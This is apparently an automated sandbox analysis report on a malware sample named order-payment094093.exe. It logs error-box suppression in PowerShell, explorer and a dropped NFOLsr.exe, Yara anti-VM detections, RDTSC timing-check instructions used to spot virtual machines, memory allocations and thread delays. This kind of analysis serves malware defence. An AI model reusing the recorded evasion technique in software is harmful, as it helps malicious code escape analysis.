Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: order-payment094093.exe PID: 1136, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: NFOLsr.exe PID: 4996, type: MEMORYSTR

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\order-payment094093.exe	RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\order-payment094093.exe	RDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\explorer.exe	RDTSC instruction interceptor: First address: 32F9904 second address: 32F990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\explorer.exe	RDTSC instruction interceptor: First address: 32F9B7E second address: 32F9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	RDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\netsh.exe	RDTSC instruction interceptor: First address: 2D59904 second address: 2D5990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\netsh.exe	RDTSC instruction interceptor: First address: 2D59B7E second address: 2D59B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\order-payment094093.exe	Memory allocated: 2D00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Memory allocated: 2EB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Memory allocated: 4EB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Memory allocated: 5590000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Memory allocated: 6590000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Memory allocated: 66C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Memory allocated: 76C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Memory allocated: A200000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Memory allocated: B200000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Memory allocated: B690000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\order-payment094093.exe	Memory allocated: C690000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Memory allocated: 30B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Memory allocated: 3310000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Memory allocated: 30B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Memory allocated: 5930000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Memory allocated: 6930000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Memory allocated: 6A60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Memory allocated: 7A60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Memory allocated: A060000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Memory allocated: B060000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Memory allocated: C060000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Memory allocated: C4F0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\order-payment094093.exe

Code function: 9_2_00409AB0 rdtsc

9_2_00409AB0

Source: C:\Users\user\Desktop\order-payment094093.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5373	Jump to behavior
